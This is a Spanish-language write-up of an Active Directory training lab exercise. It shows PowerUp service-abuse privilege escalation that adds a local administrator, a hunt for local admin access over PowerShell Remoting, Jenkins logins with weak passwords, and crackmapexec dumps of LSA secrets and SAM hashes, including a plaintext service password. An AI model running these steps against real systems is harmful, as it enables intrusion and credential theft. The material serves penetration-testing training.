# Learning Objective - 5

## 5. Service abused on the student VM for local privilege escalation

```
PS C:\AD\Tools> Import-Module .\PowerUp.ps1
PS C:\AD\Tools> Get-ServiceUnquoted -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

PS C:\AD\Tools> Get-ModifiableServiceFile -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True

PS C:\AD\Tools> Get-ModifiableService -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
VERBOSE: Current user has 'ChangeConfig' for AbyssWebServer
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True
```

Respuesta:

```
AbyssWebServer
```

Explotacion

```
[*] Checking service permissions...


ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
```

```
PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'SNMPTRAP'
WARNING: Waiting for service 'SNMP Trap (SNMPTRAP)' to stop...

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add


PS C:\AD\Tools> net users

User accounts for \\DCORP-STD723

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
john                     WDAGUtilityAccount
The command completed successfully.
```

Iniciamos una cmd como administrador.

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FDqDhgxKQ7aQe497IB2Kr%2Fimage.png?alt=media&#x26;token=b724511f-63ce-441b-bc85-b76461f2b6a2" alt=""><figcaption></figcaption></figure>

Y luego agregamos nuestro usuario como administrador local.

```
C:\Windows\system32>net localgroup Administrators dcorp\student723 /add
The command completed successfully.


C:\Windows\system32>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dcorp\Domain Admins
dcorp\student723
john
The command completed successfully.

```

## Script utilizado para buscar privilegios de administrador utilizando PowerShell Remoting

Primer intento

```
PS C:\AD\Tools> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed
```

Fallido.

Segundo intento:

```
PS C:\AD\Tools> Get-NetComputer | select samaccountname

samaccountname
--------------
DCORP-DC$
DCORP-ADMINSRV$
DCORP-APPSRV$
DCORP-CI$
DCORP-MGMT$
DCORP-MSSQL$
DCORP-SQL1$
DCORP-STDADMIN$
DCORP-STD721$
DCORP-STD722$
DCORP-STD724$
DCORP-STD723$
DCORP-STD726$
DCORP-STD729$
DCORP-STD725$
DCORP-STD728$
DCORP-STD727$
DCORP-STD731$
DCORP-STD732$
DCORP-STD730$
DCORP-STD733$
DCORP-STD735$
DCORP-STD734$
DCORP-STD736$
DCORP-STD737$
DCORP-STD739$
DCORP-STD740$
DCORP-STD738$
```

```
PS C:\AD\Tools> .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt
```

Fallido.

Tercer intento:

```
PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-std723
dcorp-adminsrv

PS C:\AD\Tools> nslookup dcorp-adminsrv
Server:  UnKnown
Address:  172.16.2.1

Name:    dcorp-adminsrv.dollarcorp.moneycorp.local
Address:  172.16.4.101
```

{% code overflow="wrap" %}

```
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv -Credential dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> ls
[dcorp-adminsrv]: PS C:\Users\student723\Documents> cd ..
[dcorp-adminsrv]: PS C:\Users\student723> cd /
[dcorp-adminsrv]: PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/11/2022  12:55 AM                Program Files
d-----          5/8/2021   2:34 AM                Program Files (x86)
d-----         12/3/2023   6:36 AM                Transcripts
d-r---         2/20/2024   4:42 PM                Users
d-----         1/10/2024   1:05 AM                Windows


```

{% endcode %}

## Jenkins user used to access Jenkins web console

<http://172.16.3.11:8080/>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FtSGQqKcewxGMihTQhjk2%2Fimage.png?alt=media&#x26;token=bb4a2516-8b7a-41f8-9631-c3b61b11c7ec" alt=""><figcaption></figcaption></figure>

```
manager:manager
```

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FCGx7BC66g7NhJa9BnELm%2Fimage.png?alt=media&#x26;token=b6963423-50c0-46d8-a2dd-ba351e7cea92" alt=""><figcaption></figcaption></figure>

```
builduser:builduser
```

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FzJhBwh6ZCRZkKfm4zFOw%2Fimage.png?alt=media&#x26;token=a5e332a9-601c-47dc-b64a-58dd2332878f" alt=""><figcaption></figcaption></figure>

Link: <http://172.16.3.11:8080/job/Project0/configure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2F9l68GcO9l1L4dzDBGUuO%2Fimage.png?alt=media&#x26;token=7e4e6d67-13c9-4da5-9f78-b916203ed65e" alt=""><figcaption></figcaption></figure>

Luego obtenemos el resultado:

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FaFMeRLHe9bEkfneghYEu%2Fimage.png?alt=media&#x26;token=07cf8214-285d-4d50-94a0-8e464cfc7617" alt=""><figcaption></figcaption></figure>

Respuesta:

```
builduser
```

## Domain user used for running Jenkins service on dcorp-ci

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FUaLY3cH5aDJGLZku0sdU%2Fimage.png?alt=media&#x26;token=f47510aa-32b6-4000-901f-7a0920d06c8e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FUqutBO8UPiYjwmRiJ0u4%2Fimage.png?alt=media&#x26;token=b9578572-af5d-4be5-806d-100d783f7c25" alt=""><figcaption></figcaption></figure>

Respuesta:

```
dcorp\ciadmin
```

Plus

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FIShxh7XTmXqshpilEEbI%2Fimage.png?alt=media&#x26;token=1897e1f9-cd64-432a-8424-7592df3c99b9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FLjzAjc2aD8CCOfJd1tCk%2Fimage.png?alt=media&#x26;token=1143b815-e079-4336-b4c4-e6501728bb13" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2F3CC1VqnCwr5mttNuqhgo%2Fimage.png?alt=media&#x26;token=babe2ae0-6e72-4102-a325-d70c0ae9ba77" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2Flia7rBIvt0hNE8XzJZue%2Fimage.png?alt=media&#x26;token=582d8e46-6812-43d1-a1d5-409a0f56fd25" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2Fl0PmHAk89c7PraxynI8A%2Fimage.png?alt=media&#x26;token=61896d49-4e70-490d-9c70-911a9a2eff1d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FvR2WRooh07HnCMXFd8P4%2Fimage.png?alt=media&#x26;token=e1be1f29-c5c6-4049-8496-bc06aacedaba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://531333195-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDeETK4zWvh5RN935wKNq%2Fuploads%2FeYg2rF3y6bqKabXPJahV%2Fimage.png?alt=media&#x26;token=61cbaf26-e68c-4a27-97a9-260664eed041" alt=""><figcaption></figcaption></figure>

```
crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --lsa
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping LSA secrets
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes256-cts-hmac-sha1-96:8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes128-cts-hmac-sha1-96:00527bdd009fedf4f9e116f7270fd8be
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:des-cbc-md5:d08a1a1fabdfc789
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:plain_password_hex:360056003d002b004c002600470051004e0055003b00220061007500280056004f00390025006a0071003c005f005e003d004600600033004a0071004d0043002200500021005100300068006f005b00490071005b002800430075006d005d007200530025006a004b004b00280023002d005d0064002d006800720049003c006e0042003600760056006f00220044004c00670045007700450059003a002a006300600051003e00600033003e005200430075006e002f0033005e0024007200630034004e002800650045006b0022002400570045007400770071005a0068005b00380026002f004b0048005c007400
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.3.11     445    DCORP-CI         dpapi_machinekey:0x4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:0xeba6b8fb6245f03382bff91e8fb6fd323080b80c
SMB         172.16.3.11     445    DCORP-CI         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.3.11     445    DCORP-CI         dcorp\ciadmin:*ContinuousIntrusion123
SMB         172.16.3.11     445    DCORP-CI         [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.secrets and /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.cached

```

```
crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --sam
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping SAM hashes
SMB         172.16.3.11     445    DCORP-CI         Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2:::
SMB         172.16.3.11     445    DCORP-CI         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         [+] Added 4 SAM hashes to the database

```